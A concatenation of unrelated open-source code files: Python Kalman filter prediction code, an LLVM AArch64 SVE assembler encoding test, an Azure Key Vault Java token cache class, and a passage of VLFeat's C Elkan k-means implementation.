self.predicted_state_cov = self.predicted_state_cov * self.scale
self.filtered_state_cov = self.filtered_state_cov * self.scale
self.forecasts_error_cov = self.forecasts_error_cov * self.scale
if self.missing_forecasts_error_cov is not None:
self.missing_forecasts_error_cov = (
self.missing_forecasts_error_cov * self.scale)
# Note: do not have to adjust the Kalman gain or tmp4
self.tmp1 = self.tmp1 * self.scale
self.tmp2 = self.tmp2 / self.scale
self.tmp3 = self.tmp3 / self.scale
if not (self.memory_no_std_forecast or
self.invert_lu or
self.solve_lu or
self.filter_collapsed):
self._standardized_forecasts_error = (
self._standardized_forecasts_error / self.scale**0.5)
# The self.model._scale value is only not None within a fixed_scale
# context, in which case it is set and indicates that we should
# generally view this results object as using a concentrated scale
# (e.g. for d.o.f. computations), but because the fixed scale was
# actually applied to the model prior to filtering, we do not need to
# make any adjustments to the filter output, etc.
elif self.model._scale is not None:
self.filter_concentrated = True
self.scale = self.model._scale
# Now, save self.llf, and handle the memory_no_likelihood case
if not self.memory_no_likelihood:
self.llf = np.sum(self.llf_obs[self.loglikelihood_burn:])
else:
self.llf = self.llf_obs[0]
self.llf_obs = None
@property
def kalman_gain(self):
"""
Kalman gain matrices
"""
if self._kalman_gain is None:
# k x n
self._kalman_gain = np.zeros(
(self.k_states, self.k_endog, self.nobs), dtype=self.dtype)
for t in range(self.nobs):
# In the case of entirely missing observations, let the Kalman
# gain be zeros.
if self.nmissing[t] == self.k_endog:
continue
design_t = 0 if self.design.shape[2] == 1 else t
transition_t = 0 if self.transition.shape[2] == 1 else t
if self.nmissing[t] == 0:
self._kalman_gain[:, :, t] = np.dot(
np.dot(
self.transition[:, :, transition_t],
self.predicted_state_cov[:, :, t]
),
np.dot(
np.transpose(self.design[:, :, design_t]),
np.linalg.inv(self.forecasts_error_cov[:, :, t])
)
)
else:
mask = ~self.missing[:, t].astype(bool)
F = self.forecasts_error_cov[np.ix_(mask, mask, [t])]
self._kalman_gain[:, mask, t] = np.dot(
np.dot(
self.transition[:, :, transition_t],
self.predicted_state_cov[:, :, t]
),
np.dot(
np.transpose(self.design[mask, :, design_t]),
np.linalg.inv(F[:, :, 0])
)
)
return self._kalman_gain
@property
def standardized_forecasts_error(self):
r"""
Standardized forecast errors
Notes
-----
The forecast errors produced by the Kalman filter are
.. math::
v_t \sim N(0, F_t)
Hypothesis tests are usually applied to the standardized residuals
.. math::
v_t^s = B_t v_t \sim N(0, I)
where :math:`B_t = L_t^{-1}` and :math:`F_t = L_t L_t'`; then
:math:`F_t^{-1} = (L_t')^{-1} L_t^{-1} = B_t' B_t`; :math:`B_t`
and :math:`L_t` are lower triangular. Finally,
:math:`B_t v_t \sim N(0, B_t F_t B_t')` and
:math:`B_t F_t B_t' = L_t^{-1} L_t L_t' (L_t')^{-1} = I`.
Thus we can rewrite :math:`v_t^s = L_t^{-1} v_t` or
:math:`L_t v_t^s = v_t`; the latter equation is the form required to
use a linear solver to recover :math:`v_t^s`. Since :math:`L_t` is
lower triangular, we can use a triangular solver (?TRTRS).
"""
if (self._standardized_forecasts_error is None
and not self.memory_no_forecast):
if self.k_endog == 1:
self._standardized_forecasts_error = (
self.forecasts_error /
self.forecasts_error_cov[0, 0, :]**0.5)
else:
from scipy import linalg
self._standardized_forecasts_error = np.zeros(
self.forecasts_error.shape, dtype=self.dtype)
for t in range(self.forecasts_error_cov.shape[2]):
if self.nmissing[t] > 0:
self._standardized_forecasts_error[:, t] = np.nan
if self.nmissing[t] < self.k_endog:
mask = ~self.missing[:, t].astype(bool)
F = self.forecasts_error_cov[np.ix_(mask, mask, [t])]
try:
upper, _ = linalg.cho_factor(F[:, :, 0])
self._standardized_forecasts_error[mask, t] = (
linalg.solve_triangular(
upper, self.forecasts_error[mask, t],
trans=1))
except linalg.LinAlgError:
self._standardized_forecasts_error[mask, t] = (
np.nan)
return self._standardized_forecasts_error
def predict(self, start=None, end=None, dynamic=None, **kwargs):
r"""
In-sample and out-of-sample prediction for state space models generally
Parameters
----------
start : int, optional
Zero-indexed observation number at which to start prediction, i.e.,
the first prediction will be at start.
end : int, optional
Zero-indexed observation number at which to end prediction, i.e.,
the last prediction will be at end.
dynamic : int, optional
Offset relative to `start` at which to begin dynamic prediction.
Prior to this observation, true endogenous values will be used for
prediction; starting with this observation and continuing through
the end of prediction, predicted endogenous values will be used
instead.
**kwargs
If the prediction range is outside of the sample range, any
of the state space representation matrices that are time-varying
must have updated values provided for the out-of-sample range.
For example, of `obs_intercept` is a time-varying component and
the prediction range extends 10 periods beyond the end of the
sample, a (`k_endog` x 10) matrix must be provided with the new
intercept values.
Returns
-------
results : kalman_filter.PredictionResults
A PredictionResults object.
Notes
-----
All prediction is performed by applying the deterministic part of the
measurement equation using the predicted state variables.
Out-of-sample prediction first applies the Kalman filter to missing
data for the number of periods desired to obtain the predicted states.
"""
# Get the start and the end of the entire prediction range
if start is None:
start = 0
elif start < 0:
raise ValueError('Cannot predict values previous to the sample.')
if end is None:
end = self.nobs
# Prediction and forecasting is performed by iterating the Kalman
# Kalman filter through the entire range [0, end]
# Then, everything is returned corresponding to the range [start, end].
# In order to perform the calculations, the range is separately split
# up into the following categories:
# - static: (in-sample) the Kalman filter is run as usual
# - dynamic: (in-sample) the Kalman filter is run, but on missing data
# - forecast: (out-of-sample) the Kalman filter is run, but on missing
# data
# Short-circuit if end is before start
if end <= start:
raise ValueError('End of prediction must be after start.')
# Get the number of forecasts to make after the end of the sample
nforecast = max(0, end - self.nobs)
# Get the number of dynamic prediction periods
# If `dynamic=True`, then assume that we want to begin dynamic
# prediction at the start of the sample prediction.
if dynamic is True:
dynamic = 0
# If `dynamic=False`, then assume we want no dynamic prediction
if dynamic is False:
dynamic = None
# Check validity of dynamic and warn or error if issues
dynamic, ndynamic = _check_dynamic(dynamic, start, end, self.nobs)
# Get the number of in-sample static predictions
if dynamic is None:
nstatic = min(end, self.nobs) - min(start, self.nobs)
else:
# (use max(., 0), since dynamic can be prior to start)
nstatic = max(dynamic - start, 0)
# Cannot do in-sample prediction if we do not have appropriate
# arrays (we can do out-of-sample forecasting, however)
if nstatic > 0 and self.memory_no_forecast_mean:
raise ValueError('In-sample prediction is not available if memory'
' conservation has been used to avoid storing'
' forecast means.')
# Cannot do dynamic in-sample prediction if we do not have appropriate
# arrays (we can do out-of-sample forecasting, however)
if ndynamic > 0 and self.memory_no_predicted:
raise ValueError('In-sample dynamic prediction is not available if'
' memory conservation has been used to avoid'
' storing forecasted or predicted state means'
' or covariances.')
# Construct the predicted state and covariance matrix for each time
# period depending on whether that time period corresponds to
# one-step-ahead prediction, dynamic prediction, or out-of-sample
# forecasting.
# If we only have simple prediction, then we can use the already saved
# Kalman filter output
if ndynamic == 0 and nforecast == 0:
results = self
# If we have dynamic prediction or forecasting, then we need to
# re-apply the Kalman filter
else:
# Figure out the period for which we need to run the Kalman filter
if dynamic is not None:
kf_start = min(start, dynamic, self.nobs)
else:
kf_start = min(start, self.nobs)
kf_end = end
# Make start, end consistent with the results that we're generating
start = max(start - kf_start, 0)
end = kf_end - kf_start
# We must at least store forecasts and predictions
kwargs['conserve_memory'] = (
self.conserve_memory & ~MEMORY_NO_FORECAST &
~MEMORY_NO_PREDICTED)
# Can't use Chandrasekhar recursions for prediction
kwargs['filter_method'] = (
self.model.filter_method & ~FILTER_CHANDRASEKHAR)
# Even if we have not stored all predicted values (means and covs),
# we can still do pure out-of-sample forecasting because we will
# always have stored the last predicted values. In this case, we
# will initialize the forecasting filter with these values
if self.memory_no_predicted:
constant = self.predicted_state[..., -1]
stationary_cov = self.predicted_state_cov[..., -1]
# Otherwise initialize with the predicted state / cov from the
# existing results, at index kf_start (note that the time
# dimension of predicted_state and predicted_state_cov is
# self.nobs + 1; so e.g. in the case of pure forecasting we should
# be using the very last predicted state and predicted state cov
# elements, and kf_start will equal self.nobs which is correct)
else:
constant = self.predicted_state[..., kf_start]
stationary_cov = self.predicted_state_cov[..., kf_start]
kwargs.update({'initialization': 'known',
'constant': constant,
'stationary_cov': stationary_cov})
# Construct the new endogenous array.
endog = np.zeros((nforecast, self.k_endog)) * np.nan
model = self.model.extend(
endog, start=kf_start, end=kf_end - nforecast, **kwargs)
# Have to retroactively modify the model's endog
if ndynamic > 0:
model.endog[:, -(ndynamic + nforecast):] = np.nan
with model.fixed_scale(self.scale):
results = model.filter()
return PredictionResults(results, start, end, nstatic, ndynamic,
nforecast)
class PredictionResults(FilterResults):
r"""
Results of in-sample and out-of-sample prediction for state space models
generally
Parameters
----------
results : FilterResults
Output from filtering, corresponding to the prediction desired
start : int
Zero-indexed observation number at which to start forecasting,
i.e., the first forecast will be at start.
end : int
Zero-indexed observation number at which to end forecasting, i.e.,
the last forecast will be at end.
nstatic : int
Number of in-sample static predictions (these are always the first
elements of the prediction output).
ndynamic : int
Number of in-sample dynamic predictions (these always follow the static
predictions directly, and are directly followed by the forecasts).
nforecast : int
Number of in-sample forecasts (these always follow the dynamic
predictions directly).
Attributes
----------
npredictions : int
Number of observations in the predicted series; this is not necessarily
the same as the number of observations in the original model from which
prediction was performed.
start : int
Zero-indexed observation number at which to start prediction,
i.e., the first predict will be at `start`; this is relative to the
original model from which prediction was performed.
end : int
Zero-indexed observation number at which to end prediction,
i.e., the last predict will be at `end`; this is relative to the
original model from which prediction was performed.
nstatic : int
Number of in-sample static predictions.
ndynamic : int
Number of in-sample dynamic predictions.
nforecast : int
Number of in-sample forecasts.
endog : ndarray
The observation vector.
design : ndarray
The design matrix, :math:`Z`.
obs_intercept : ndarray
The intercept for the observation equation, :math:`d`.
obs_cov : ndarray
The covariance matrix for the observation equation :math:`H`.
transition : ndarray
The transition matrix, :math:`T`.
state_intercept : ndarray
The intercept for the transition equation, :math:`c`.
selection : ndarray
The selection matrix, :math:`R`.
state_cov : ndarray
The covariance matrix for the state equation :math:`Q`.
filtered_state : ndarray
The filtered state vector at each time period.
filtered_state_cov : ndarray
The filtered state covariance matrix at each time period.
predicted_state : ndarray
The predicted state vector at each time period.
predicted_state_cov : ndarray
The predicted state covariance matrix at each time period.
forecasts : ndarray
The one-step-ahead forecasts of observations at each time period.
forecasts_error : ndarray
The forecast errors at each time period.
forecasts_error_cov : ndarray
The forecast error covariance matrices at each time period.
Notes
-----
The provided ranges must be conformable, meaning that it must be that
`end - start == nstatic + ndynamic + nforecast`.
This class is essentially a view to the FilterResults object, but
returning the appropriate ranges for everything.
"""
representation_attributes = [
'endog', 'design', 'design', 'obs_intercept',
'obs_cov', 'transition', 'state_intercept', 'selection',
'state_cov'
]
filter_attributes = [
'filtered_state', 'filtered_state_cov',
'predicted_state', 'predicted_state_cov',
'forecasts', 'forecasts_error', 'forecasts_error_cov'
]
def __init__(self, results, start, end, nstatic, ndynamic, nforecast):
# Save the filter results object
self.results = results
# Save prediction ranges
self.npredictions = start - end
self.start = start
self.end = end
self.nstatic = nstatic
self.ndynamic = ndynamic
self.nforecast = nforecast
def clear(self):
attributes = (['endog'] + self.representation_attributes
+ self.filter_attributes)
for attr in attributes:
_attr = '_' + attr
if hasattr(self, _attr):
delattr(self, _attr)
def __getattr__(self, attr):
"""
Provide access to the representation and filtered output in the
appropriate range (`start` - `end`).
"""
# Prevent infinite recursive lookups
if attr[0] == '_':
raise AttributeError("'%s' object has no attribute '%s'" %
(self.__class__.__name__, attr))
_attr = '_' + attr
# Cache the attribute
if not hasattr(self, _attr):
if attr == 'endog' or attr in self.filter_attributes:
# Get a copy
value = getattr(self.results, attr).copy()
# Subset to the correct time frame
value = value[..., self.start:self.end]
elif attr in self.representation_attributes:
value = getattr(self.results, attr).copy()
# If a time-invariant matrix, return it. Otherwise, subset to
# the correct period.
if value.shape[-1] == 1:
value = value[..., 0]
else:
value = value[..., self.start:self.end]
else:
raise AttributeError("'%s' object has no attribute '%s'" %
(self.__class__.__name__, attr))
setattr(self, _attr, value)
return getattr(self, _attr)
def _check_dynamic(dynamic, start, end, nobs):
"""
Verify dynamic and warn or error if issues
Parameters
----------
dynamic : {int, None}
The offset relative to start of the dynamic forecasts. None if no
dynamic forecasts are required.
start : int
The location of the first forecast.
end : int
The location of the final forecast (inclusive).
nobs : int
The number of observations in the time series.
Returns
-------
dynamic : {int, None}
The start location of the first dynamic forecast. None if there
are no in-sample dynamic forecasts.
ndynamic : int
The number of dynamic forecasts
"""
if dynamic is None:
return dynamic, 0
# Replace the relative dynamic offset with an absolute offset
dynamic = start + dynamic
# Validate the `dynamic` parameter
if dynamic < 0:
raise ValueError('Dynamic prediction cannot begin prior to the'
' first observation in the sample.')
elif dynamic > end:
warn('Dynamic prediction specified to begin after the end of'
' prediction, and so has no effect.', ValueWarning)
return None, 0
elif dynamic > nobs:
warn('Dynamic prediction specified to begin during'
' out-of-sample forecasting period, and so has no'
' effect.', ValueWarning)
return None, 0
# Get the total size of the desired dynamic forecasting component
# Note: the first `dynamic` periods of prediction are actually
# *not* dynamic, because dynamic prediction begins at observation
# `dynamic`.
ndynamic = max(0, min(end, nobs) - dynamic)
return dynamic, ndynamic
| {
"pile_set_name": "Github"
} |
// RUN: llvm-mc -triple=aarch64 -show-encoding -mattr=+sve < %s \
// RUN: | FileCheck %s --check-prefixes=CHECK-ENCODING,CHECK-INST
// RUN: not llvm-mc -triple=aarch64 -show-encoding < %s 2>&1 \
// RUN: | FileCheck %s --check-prefix=CHECK-ERROR
// RUN: llvm-mc -triple=aarch64 -filetype=obj -mattr=+sve < %s \
// RUN: | llvm-objdump -d -mattr=+sve - | FileCheck %s --check-prefix=CHECK-INST
// RUN: llvm-mc -triple=aarch64 -filetype=obj -mattr=+sve < %s \
// RUN: | llvm-objdump -d - | FileCheck %s --check-prefix=CHECK-UNKNOWN
lsr z0.b, z0.b, #1
// CHECK-INST: lsr z0.b, z0.b, #1
// CHECK-ENCODING: [0x00,0x94,0x2f,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 2f 04 <unknown>
lsr z31.b, z31.b, #8
// CHECK-INST: lsr z31.b, z31.b, #8
// CHECK-ENCODING: [0xff,0x97,0x28,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 28 04 <unknown>
lsr z0.h, z0.h, #1
// CHECK-INST: lsr z0.h, z0.h, #1
// CHECK-ENCODING: [0x00,0x94,0x3f,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 3f 04 <unknown>
lsr z31.h, z31.h, #16
// CHECK-INST: lsr z31.h, z31.h, #16
// CHECK-ENCODING: [0xff,0x97,0x30,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 30 04 <unknown>
lsr z0.s, z0.s, #1
// CHECK-INST: lsr z0.s, z0.s, #1
// CHECK-ENCODING: [0x00,0x94,0x7f,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 7f 04 <unknown>
lsr z31.s, z31.s, #32
// CHECK-INST: lsr z31.s, z31.s, #32
// CHECK-ENCODING: [0xff,0x97,0x60,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 60 04 <unknown>
lsr z0.d, z0.d, #1
// CHECK-INST: lsr z0.d, z0.d, #1
// CHECK-ENCODING: [0x00,0x94,0xff,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 94 ff 04 <unknown>
lsr z31.d, z31.d, #64
// CHECK-INST: lsr z31.d, z31.d, #64
// CHECK-ENCODING: [0xff,0x97,0xa0,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: ff 97 a0 04 <unknown>
lsr z0.b, p0/m, z0.b, #1
// CHECK-INST: lsr z0.b, p0/m, z0.b, #1
// CHECK-ENCODING: [0xe0,0x81,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 81 01 04 <unknown>
lsr z31.b, p0/m, z31.b, #8
// CHECK-INST: lsr z31.b, p0/m, z31.b, #8
// CHECK-ENCODING: [0x1f,0x81,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 81 01 04 <unknown>
lsr z0.h, p0/m, z0.h, #1
// CHECK-INST: lsr z0.h, p0/m, z0.h, #1
// CHECK-ENCODING: [0xe0,0x83,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 83 01 04 <unknown>
lsr z31.h, p0/m, z31.h, #16
// CHECK-INST: lsr z31.h, p0/m, z31.h, #16
// CHECK-ENCODING: [0x1f,0x82,0x01,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 82 01 04 <unknown>
lsr z0.s, p0/m, z0.s, #1
// CHECK-INST: lsr z0.s, p0/m, z0.s, #1
// CHECK-ENCODING: [0xe0,0x83,0x41,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 83 41 04 <unknown>
lsr z31.s, p0/m, z31.s, #32
// CHECK-INST: lsr z31.s, p0/m, z31.s, #32
// CHECK-ENCODING: [0x1f,0x80,0x41,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 41 04 <unknown>
lsr z0.d, p0/m, z0.d, #1
// CHECK-INST: lsr z0.d, p0/m, z0.d, #1
// CHECK-ENCODING: [0xe0,0x83,0xc1,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 83 c1 04 <unknown>
lsr z31.d, p0/m, z31.d, #64
// CHECK-INST: lsr z31.d, p0/m, z31.d, #64
// CHECK-ENCODING: [0x1f,0x80,0x81,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 81 04 <unknown>
lsr z0.b, p0/m, z0.b, z0.b
// CHECK-INST: lsr z0.b, p0/m, z0.b, z0.b
// CHECK-ENCODING: [0x00,0x80,0x11,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 11 04 <unknown>
lsr z0.h, p0/m, z0.h, z0.h
// CHECK-INST: lsr z0.h, p0/m, z0.h, z0.h
// CHECK-ENCODING: [0x00,0x80,0x51,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 51 04 <unknown>
lsr z0.s, p0/m, z0.s, z0.s
// CHECK-INST: lsr z0.s, p0/m, z0.s, z0.s
// CHECK-ENCODING: [0x00,0x80,0x91,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 91 04 <unknown>
lsr z0.d, p0/m, z0.d, z0.d
// CHECK-INST: lsr z0.d, p0/m, z0.d, z0.d
// CHECK-ENCODING: [0x00,0x80,0xd1,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 00 80 d1 04 <unknown>
lsr z0.b, p0/m, z0.b, z1.d
// CHECK-INST: lsr z0.b, p0/m, z0.b, z1.d
// CHECK-ENCODING: [0x20,0x80,0x19,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 19 04 <unknown>
lsr z0.h, p0/m, z0.h, z1.d
// CHECK-INST: lsr z0.h, p0/m, z0.h, z1.d
// CHECK-ENCODING: [0x20,0x80,0x59,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 59 04 <unknown>
lsr z0.s, p0/m, z0.s, z1.d
// CHECK-INST: lsr z0.s, p0/m, z0.s, z1.d
// CHECK-ENCODING: [0x20,0x80,0x99,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 99 04 <unknown>
lsr z0.b, z1.b, z2.d
// CHECK-INST: lsr z0.b, z1.b, z2.d
// CHECK-ENCODING: [0x20,0x84,0x22,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 84 22 04 <unknown>
lsr z0.h, z1.h, z2.d
// CHECK-INST: lsr z0.h, z1.h, z2.d
// CHECK-ENCODING: [0x20,0x84,0x62,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 84 62 04 <unknown>
lsr z0.s, z1.s, z2.d
// CHECK-INST: lsr z0.s, z1.s, z2.d
// CHECK-ENCODING: [0x20,0x84,0xa2,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 84 a2 04 <unknown>
// --------------------------------------------------------------------------//
// Test compatibility with MOVPRFX instruction.
movprfx z31.d, p0/z, z6.d
// CHECK-INST: movprfx z31.d, p0/z, z6.d
// CHECK-ENCODING: [0xdf,0x20,0xd0,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: df 20 d0 04 <unknown>
lsr z31.d, p0/m, z31.d, #64
// CHECK-INST: lsr z31.d, p0/m, z31.d, #64
// CHECK-ENCODING: [0x1f,0x80,0x81,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 81 04 <unknown>
movprfx z31, z6
// CHECK-INST: movprfx z31, z6
// CHECK-ENCODING: [0xdf,0xbc,0x20,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: df bc 20 04 <unknown>
lsr z31.d, p0/m, z31.d, #64
// CHECK-INST: lsr z31.d, p0/m, z31.d, #64
// CHECK-ENCODING: [0x1f,0x80,0x81,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 1f 80 81 04 <unknown>
movprfx z0.s, p0/z, z7.s
// CHECK-INST: movprfx z0.s, p0/z, z7.s
// CHECK-ENCODING: [0xe0,0x20,0x90,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 20 90 04 <unknown>
lsr z0.s, p0/m, z0.s, z1.d
// CHECK-INST: lsr z0.s, p0/m, z0.s, z1.d
// CHECK-ENCODING: [0x20,0x80,0x99,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 99 04 <unknown>
movprfx z0, z7
// CHECK-INST: movprfx z0, z7
// CHECK-ENCODING: [0xe0,0xbc,0x20,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: e0 bc 20 04 <unknown>
lsr z0.s, p0/m, z0.s, z1.d
// CHECK-INST: lsr z0.s, p0/m, z0.s, z1.d
// CHECK-ENCODING: [0x20,0x80,0x99,0x04]
// CHECK-ERROR: instruction requires: sve
// CHECK-UNKNOWN: 20 80 99 04 <unknown>
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.security.keyvault.administration.implementation;
import com.azure.core.credential.AccessToken;
import com.azure.core.credential.TokenRequestContext;
import reactor.core.publisher.FluxSink;
import reactor.core.publisher.Mono;
import reactor.core.publisher.ReplayProcessor;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.function.Function;
/**
* A token cache that supports caching a token and refreshing it.
*/
class ScopeTokenCache {
private final AtomicBoolean wip;
private AccessToken cache;
private final ReplayProcessor<AccessToken> emitterProcessor = ReplayProcessor.create(1);
private final FluxSink<AccessToken> sink = emitterProcessor.sink(FluxSink.OverflowStrategy.BUFFER);
private final Function<TokenRequestContext, Mono<AccessToken>> getNew;
private TokenRequestContext request;
/**
* Creates an instance of RefreshableTokenCredential with default scheme "Bearer".
*
* @param getNew a method to get a new token
*/
ScopeTokenCache(Function<TokenRequestContext, Mono<AccessToken>> getNew) {
this.wip = new AtomicBoolean(false);
this.getNew = getNew;
}
public void setTokenRequest(TokenRequestContext request) {
this.request = request;
}
/**
* Asynchronously get a token from either the cache or replenish the cache with a new token.
* @return a Publisher that emits an AccessToken
*/
public Mono<AccessToken> getToken() {
if (cache != null && !cache.isExpired()) {
return Mono.just(cache);
}
return Mono.defer(() -> {
if (!wip.getAndSet(true)) {
return getNew.apply(request).doOnNext(ac -> cache = ac)
.doOnNext(sink::next)
.doOnError(sink::error)
.doOnTerminate(() -> wip.set(false));
} else {
return emitterProcessor.next();
}
});
}
}
| {
"pile_set_name": "Github"
} |
/** @file ikmeans_elkan.tc
** @brief Integer K-Means - Elkan Algorithm - Definition
** @author Andrea Vedaldi
**/
/*
Copyright (C) 2007-12 Andrea Vedaldi and Brian Fulkerson.
All rights reserved.
This file is part of the VLFeat library and is made available under
the terms of the BSD license (see the COPYING file).
*/
#include "mathop.h"
/** @internal
** Update inter cluster distance table.
**/
static void
vl_ikm_elkan_update_inter_dist (VlIKMFilt *f)
{
vl_uindex i, k, kp ;
/* inter cluster distances */
for(k = 0 ; k < f->K ; ++ k) {
for(kp = 0 ; kp < f->K ; ++ kp) {
vl_ikmacc_t dist = 0 ;
if (k != kp) {
for(i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = f->centers [kp * f->M + i] - f->centers [k * f->M + i] ;
dist += delta * delta ;
}
}
f->inter_dist [k * f->K + kp] = f->inter_dist [kp * f->K + k] = dist >> 2 ;
}
}
}
/** @internal
** @brief Helper function to initialize filter for Triangle algorithm
** @param f filter.
**/
static void
vl_ikm_init_elkan (VlIKMFilt *f)
{
if (f->inter_dist) {
vl_free (f-> inter_dist) ;
}
f->inter_dist = vl_malloc (sizeof(*f->inter_dist) * f->K * f->K) ;
vl_ikm_elkan_update_inter_dist (f) ;
}
/** @internal
** @brief Elkan algorithm
** @param f IKM quantizer.
** @param data Data to quantize.
** @param N Number of data elements.
**/
static int
vl_ikm_train_elkan (VlIKMFilt* f, vl_uint8 const* data, vl_size N)
{
/* REMARK !! All distances are squared !! */
vl_uindex i,pass,c,cp,x,cx ;
vl_size dist_calc = 0 ;
vl_ikmacc_t dist ;
vl_ikmacc_t *m_pt = vl_malloc(sizeof(*m_pt) * f->M * f->K) ; /* new centers (temp) */
vl_ikmacc_t *u_pt = vl_malloc(sizeof(*u_pt) * N) ; /* upper bound (may str) */
char *r_pt = vl_malloc(sizeof(*r_pt) * 1 * N) ; /* flag: u is strict */
vl_ikmacc_t *s_pt = vl_malloc(sizeof(*s_pt) * f->K) ; /* min cluster dist. */
vl_ikmacc_t *l_pt = vl_malloc(sizeof(*l_pt) * N * f->K) ; /* lower bound */
vl_ikmacc_t *d_pt = f->inter_dist ; /* half inter clst dist */
vl_uint32 *asgn = vl_malloc (sizeof(*asgn) * N) ;
vl_uint32 *counts =vl_malloc (sizeof(*counts) * N) ;
int done = 0 ;
/* do passes */
vl_ikm_elkan_update_inter_dist (f) ;
/* init */
memset(l_pt, 0, sizeof(*l_pt) * N * f->K) ;
memset(u_pt, 0, sizeof(*u_pt) * N) ;
memset(r_pt, 0, sizeof(*r_pt) * N) ;
for(x = 0 ; x < N ; ++x) {
vl_ikmacc_t best_dist ;
/* do first cluster `by hand' */
dist_calc ++ ;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = (vl_ikmacc_t)data[x * f->M + i] - f->centers[i] ;
dist += delta*delta ;
}
cx = 0 ;
best_dist = dist ;
l_pt[x] = dist ;
/* do other clusters */
for(c = 1 ; c < f->K ; ++c) {
if(d_pt[f->K * cx + c] < best_dist) {
/* might need to be updated */
dist_calc++ ;
for(dist=0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta =
(vl_ikmacc_t)data[x * f->M + i]
- f->centers[c * f->M + i] ;
dist += delta * delta ;
}
/* lower bound */
l_pt[N*c + x] = dist ;
if(dist < best_dist) {
best_dist = dist ;
cx = c ;
}
}
}
asgn[x] = (vl_uint32)cx ;
u_pt[x] = best_dist ;
}
/* --------------------------------------------------------------------
* Passes
* ------------------------------------------------------------------ */
for (pass = 0 ; 1 ; ++ pass) {
/* ------------------------------------------------------------------
* Re-calculate means
* ---------------------------------------------------------------- */
memset(m_pt, 0, sizeof(*m_pt) * f->M * f->K) ;
memset(counts, 0, sizeof(*counts) * f->K) ;
/* accumulate */
for(x = 0 ; x < N ; ++x) {
int cx = asgn[x] ;
++ counts[ cx ] ;
for(i = 0 ; i < f->M ; ++i) {
m_pt[cx * f->M + i] += data[x * f->M + i] ;
}
}
/* normalize */
for(c = 0 ; c < f->K ; ++c) {
vl_ikmacc_t n = counts[c] ;
if(n > 0) {
for(i = 0 ; i < f->M ; ++i) {
m_pt[c * f->M + i] /= n ;
}
} else {
for(i = 0 ; i < f->M ; ++i) {
/*m_pt[c*M + i] = data[pairs_pt[c].j*M + i] ;*/
}
}
}
/* ------------------------------------------------------------------
* Update bounds
* --------------------------------------------------------------- */
for(c = 0 ; c < f->K ; ++c) {
/* distance d(m(c),c) and update c */
dist_calc++ ;
for(dist = 0, i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta =
(vl_ikmacc_t)m_pt[c * f->M + i]
- f->centers[c * f->M + i] ;
f->centers[c * f->M + i] = m_pt[c * f->M +i] ;
dist += delta * delta ;
}
for(x = 0 ; x < N ; ++x) {
vl_ikmacc_t lxc = l_pt[c * N + x] ;
vl_uindex cx = (int) asgn[x] ;
/* lower bound */
if(dist < lxc) {
lxc = (vl_ikmacc_t) (lxc + dist - 2*(vl_fast_sqrt_ui64(lxc)+1)*(vl_fast_sqrt_ui64(dist)+1)) ;
} else {
lxc = 0 ;
}
l_pt[c*N + x] = lxc ;
/* upper bound */
if(c == cx) {
vl_ikmacc_t ux = u_pt[x] ;
u_pt[x] = (vl_ikmacc_t) (ux + dist + 2 * (vl_fast_sqrt_ui64(ux)+1)*(vl_fast_sqrt_ui64(dist)+1)) ;
r_pt[x] = 1 ;
}
}
}
/* inter cluster distances */
for(c = 0 ; c < f->K ; ++c) {
for(cp = 0 ; cp < f->K ; ++cp) {
dist = 0 ;
if( c != cp ) {
dist_calc++;
for(i = 0 ; i < f->M ; ++i) {
vl_ikmacc_t delta = f->centers[cp * f->M + i] - f->centers[ c * f->M + i] ;
dist += delta*delta ;
}
}
d_pt[c * f->K + cp] = d_pt[cp * f->K + c] = dist>>2 ;
}
